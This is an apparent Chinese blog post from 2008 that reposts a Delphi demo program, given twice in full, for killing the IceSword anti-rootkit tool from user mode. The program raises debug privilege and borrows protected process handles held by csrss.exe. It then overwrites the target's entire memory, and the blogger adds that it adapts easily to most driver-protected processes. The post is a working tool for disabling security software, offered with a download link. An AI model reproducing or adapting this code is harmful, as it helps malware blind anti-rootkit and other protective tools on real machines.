Calendar
| 日 | 一 | 二 | 三 | 四 | 五 | 六 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | 7 |
| 8 | 9 | 10 | 11 | 12 | 13 | 14 |
| 15 | 16 | 17 | 18 | 19 | 20 | 21 |
| 22 | 23 | 24 | 25 | 26 | 27 | 28 |
| 29 | 30 |
Tools
Catalog
页面载入中,请稍候...
Entries
页面载入中,请稍候...
Replies
页面载入中,请稍候...
search
页面载入中,请稍候...
FriendLink
Blog Info
页面载入中,请稍候...
页面载入中,请稍候...
Ring3下干掉IceSword
[ 2008-6-24 23:27:00 | By: hhack ]
//{$DEFINE minimum}
{$E exe}
{$IMAGEBASE $00400000}
{$R-}
{$Q-}
{$IFDEF minimum}
program Icie1;
{$ENDIF}
{$IFNDEF minimum}
unit Icie1;
interface
implementation
{$ENDIF}
uses
Windows, WinBase,
RTL,
WinNative;
const
mymsg: PWideChar = 'Author:pjf(ustc)';
Icie: PWideChar = 'Icie!';
var
buf: LBuf;
icie_f: boolean = false;
type
_SYSINFOBUF = record
uHandleCount: ULONG;
rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION;
end;
SYSINFOBUF = _SYSINFOBUF;
PSYSINFOBUF = ^_SYSINFOBUF;
procedure FuckIcie(dwProcessId: DWORD);
var
h_dup, ph: THANDLE;
bytesIO: ULONG;
buf: PSYSINFOBUF;
c: integer;
cid1: CLIENT_ID;
attr: OBJECT_ATTRIBUTES;
csrss_id: THANDLE;
tmp1: LBuf;
pBuffer: PROCESSENTRY32W;
SnapShotHandle: THANDLE;
pbi: PROCESS_BASIC_INFORMATION;
p0, p1: PChar;
sz, oldp: ULONG;
begin
csrss_id := 0;
pBuffer.dwSize := sizeof(PROCESSENTRY32W);
SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
if (SnapShotHandle <> INVALID_HANDLE_VALUE) then
if Process32FirstW(SnapShotHandle, @pBuffer) then
repeat
ExtractFileNameW(pBuffer.szExeFile, tmp1);
if (strcmpiW(tmp1, 'csrss.exe') = 0) then
begin
csrss_id := pBuffer.th32ProcessID;
break;
end;
until (not Process32NextW(SnapShotHandle, @pBuffer));
CloseHandle(SnapShotHandle);
if (csrss_id <> 0) then MessageBoxW(0, 'backdoor friendly process located', Icie, MB_OK);
attr.Length := sizeof(OBJECT_ATTRIBUTES);
attr.RootDirectory := 0;
attr.ObjectName := nil;
attr.Attributes := 0;
attr.SecurityDescriptor := nil;
attr.SecurityQualityOfService := nil;
cid1.UniqueProcess := csrss_id;
cid1.UniqueThread := 0;
ZwOpenProcess(@ph, PROCESS_ALL_ACCESS, @attr, @cid1);
bytesIO := 4194304;
buf := nil;
ZwAllocateVirtualMemory(GetCurrentProcess(), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE);
ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO);
for c := 0 to buf^.uHandleCount - 1 do
if (buf^.rHandleTable[c].ProcessId = csrss_id) then
begin
if (buf^.rHandleTable[c].ObjectTypeNumber = 5) then
begin
if (ZwDuplicateObject(ph, buf^.rHandleTable[c].Handle, DWORD(-1), @h_dup,
0, 0, DUPLICATE_SAME_ACCESS) = STATUS_SUCCESS) then
begin
ZwQueryInformationProcess(h_dup, ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO);
if (pbi.UniqueProcessId = dwProcessId) then
begin
MessageBoxW(0, 'In a process... Press "Ok" and please wait few seconds, after it IceSword will be destroyed =)))))', Icie, MB_OK);
p0 := pointer($10000);
repeat
p1 := p0;
sz := $1000;
if (ZwProtectVirtualMemory(h_dup, @p1, @sz, PAGE_EXECUTE_READWRITE, @oldp) = STATUS_SUCCESS) then
ZwWriteVirtualMemory(h_dup, p0, buf, $1000, @oldp);
p0 := p0 + $1000;
until (DWORD(p0) >= $80000000);
MessageBoxW(0, 'Icie is now f***d and unworkable =) l ol', Icie, 0);
end;
ZwClose(h_dup);
end;
end;
end;
ZwClose(ph);
bytesIO := 0;
ZwFreeVirtualMemory(GetCurrentProcess(), @buf, @bytesIO, MEM_RELEASE);
end;
function enum2(_hwnd: HWND; lParam: LPARAM): BOOL; stdcall;
var
pid: Cardinal;
buf1: LBuf;
i, k: integer;
begin
result := true;
memzero(@buf, sizeof(LBuf));
memzero(@buf1, sizeof(LBuf));
GetWindowTextW(_hwnd, @buf, MAX_PATH);
k := 0;
for i := 0 to strlenW(buf) do
if buf <> ' ' then
begin
buf1[k] := buf;
inc(k);
end;
if (strcmpiW(mymsg, @buf1) = 0) then
begin
MessageBoxW(0, 'Icie found, let''s f*** it!', Icie, 0);
icie_f := true;
GetWindowThreadProcessId(_hwnd, @pid);
FuckIcie(pid);
end;
end;
function enum1(_hwnd: HWND; lParam: LPARAM): BOOL; stdcall;
begin
result := true;
EnumChildWindows(_hwnd, @enum2, 0);
end;
procedure DetectIcie();
begin
EnumWindows(@enum1, 0);
end;
var
prev: integer;
begin
if (RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, @prev) <> STATUS_SUCCESS) then
begin
MessageBoxW(0, 'Cannot get more privilegies', Icie, MB_OK);
ExitProcess(0);
end;
MessageBoxW(0, 'This simple app demonstrates how to destroy untouchable IceSword (any english version) from poor User Mode'#13#13#10 +
'Inline Hooks will not help Icie!'#13#10'Demo by EP_X0FF and DNY', Icie, 0);
DetectIcie();
if not icie_f then MessageBoxW(0, 'Start Icie English version first! =)))', Icie, MB_OK);
end.
适用于英文版,只需改一下即可用于任何版本及多数受驱动保护的进程。
这个 Demo 的作者是EP_X0FF 和 DNY,也就是RkUnHooker的作者。
这大概是 RkU 使用的强制杀进程方法——所谓的虚拟内存擦除技术——的 Ring3 版本吧~ [s:2]
点击下载此文件
{$E exe}
{$IMAGEBASE $00400000}
{$R-}
{$Q-}
{$IFDEF minimum}
program Icie1;
{$ENDIF}
{$IFNDEF minimum}
unit Icie1;
interface
implementation
{$ENDIF}
uses
Windows, WinBase,
RTL,
WinNative;
const
mymsg: PWideChar = 'Author:pjf(ustc)';
Icie: PWideChar = 'Icie!';
var
buf: LBuf;
icie_f: boolean = false;
type
_SYSINFOBUF = record
uHandleCount: ULONG;
rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION;
end;
SYSINFOBUF = _SYSINFOBUF;
PSYSINFOBUF = ^_SYSINFOBUF;
procedure FuckIcie(dwProcessId: DWORD);
var
h_dup, ph: THANDLE;
bytesIO: ULONG;
buf: PSYSINFOBUF;
c: integer;
cid1: CLIENT_ID;
attr: OBJECT_ATTRIBUTES;
csrss_id: THANDLE;
tmp1: LBuf;
pBuffer: PROCESSENTRY32W;
SnapShotHandle: THANDLE;
pbi: PROCESS_BASIC_INFORMATION;
p0, p1: PChar;
sz, oldp: ULONG;
begin
csrss_id := 0;
pBuffer.dwSize := sizeof(PROCESSENTRY32W);
SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
if (SnapShotHandle <> INVALID_HANDLE_VALUE) then
if Process32FirstW(SnapShotHandle, @pBuffer) then
repeat
ExtractFileNameW(pBuffer.szExeFile, tmp1);
if (strcmpiW(tmp1, 'csrss.exe') = 0) then
begin
csrss_id := pBuffer.th32ProcessID;
break;
end;
until (not Process32NextW(SnapShotHandle, @pBuffer));
CloseHandle(SnapShotHandle);
if (csrss_id <> 0) then MessageBoxW(0, 'backdoor friendly process located', Icie, MB_OK);
attr.Length := sizeof(OBJECT_ATTRIBUTES);
attr.RootDirectory := 0;
attr.ObjectName := nil;
attr.Attributes := 0;
attr.SecurityDescriptor := nil;
attr.SecurityQualityOfService := nil;
cid1.UniqueProcess := csrss_id;
cid1.UniqueThread := 0;
ZwOpenProcess(@ph, PROCESS_ALL_ACCESS, @attr, @cid1);
bytesIO := 4194304;
buf := nil;
ZwAllocateVirtualMemory(GetCurrentProcess(), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE);
ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO);
for c := 0 to buf^.uHandleCount - 1 do
if (buf^.rHandleTable[c].ProcessId = csrss_id) then
begin
if (buf^.rHandleTable[c].ObjectTypeNumber = 5) then
begin
if (ZwDuplicateObject(ph, buf^.rHandleTable[c].Handle, DWORD(-1), @h_dup,
0, 0, DUPLICATE_SAME_ACCESS) = STATUS_SUCCESS) then
begin
ZwQueryInformationProcess(h_dup, ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO);
if (pbi.UniqueProcessId = dwProcessId) then
begin
MessageBoxW(0, 'In a process... Press "Ok" and please wait few seconds, after it IceSword will be destroyed =)))))', Icie, MB_OK);
p0 := pointer($10000);
repeat
p1 := p0;
sz := $1000;
if (ZwProtectVirtualMemory(h_dup, @p1, @sz, PAGE_EXECUTE_READWRITE, @oldp) = STATUS_SUCCESS) then
ZwWriteVirtualMemory(h_dup, p0, buf, $1000, @oldp);
p0 := p0 + $1000;
until (DWORD(p0) >= $80000000);
MessageBoxW(0, 'Icie is now f***d and unworkable =) l ol', Icie, 0);
end;
ZwClose(h_dup);
end;
end;
end;
ZwClose(ph);
bytesIO := 0;
ZwFreeVirtualMemory(GetCurrentProcess(), @buf, @bytesIO, MEM_RELEASE);
end;
function enum2(_hwnd: HWND; lParam: LPARAM): BOOL; stdcall;
var
pid: Cardinal;
buf1: LBuf;
i, k: integer;
begin
result := true;
memzero(@buf, sizeof(LBuf));
memzero(@buf1, sizeof(LBuf));
GetWindowTextW(_hwnd, @buf, MAX_PATH);
k := 0;
for i := 0 to strlenW(buf) do
if buf <> ' ' then
begin
buf1[k] := buf;
inc(k);
end;
if (strcmpiW(mymsg, @buf1) = 0) then
begin
MessageBoxW(0, 'Icie found, let''s f*** it!', Icie, 0);
icie_f := true;
GetWindowThreadProcessId(_hwnd, @pid);
FuckIcie(pid);
end;
end;
function enum1(_hwnd: HWND; lParam: LPARAM): BOOL; stdcall;
begin
result := true;
EnumChildWindows(_hwnd, @enum2, 0);
end;
procedure DetectIcie();
begin
EnumWindows(@enum1, 0);
end;
var
prev: integer;
begin
if (RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, @prev) <> STATUS_SUCCESS) then
begin
MessageBoxW(0, 'Cannot get more privilegies', Icie, MB_OK);
ExitProcess(0);
end;
MessageBoxW(0, 'This simple app demonstrates how to destroy untouchable IceSword (any english version) from poor User Mode'#13#13#10 +
'Inline Hooks will not help Icie!'#13#10'Demo by EP_X0FF and DNY', Icie, 0);
DetectIcie();
if not icie_f then MessageBoxW(0, 'Start Icie English version first! =)))', Icie, MB_OK);
end.
适用于英文版,只需改一下即可用于任何版本及多数受驱动保护的进程。
这个 Demo 的作者是EP_X0FF 和 DNY,也就是RkUnHooker的作者。
这大概是 RkU 使用的强制杀进程方法——所谓的虚拟内存擦除技术——的 Ring3 版本吧~ [s:2]
点击下载此文件- 上一篇:用UpdateResource修改EXE文件图标
- 下一篇:网吧辅助工具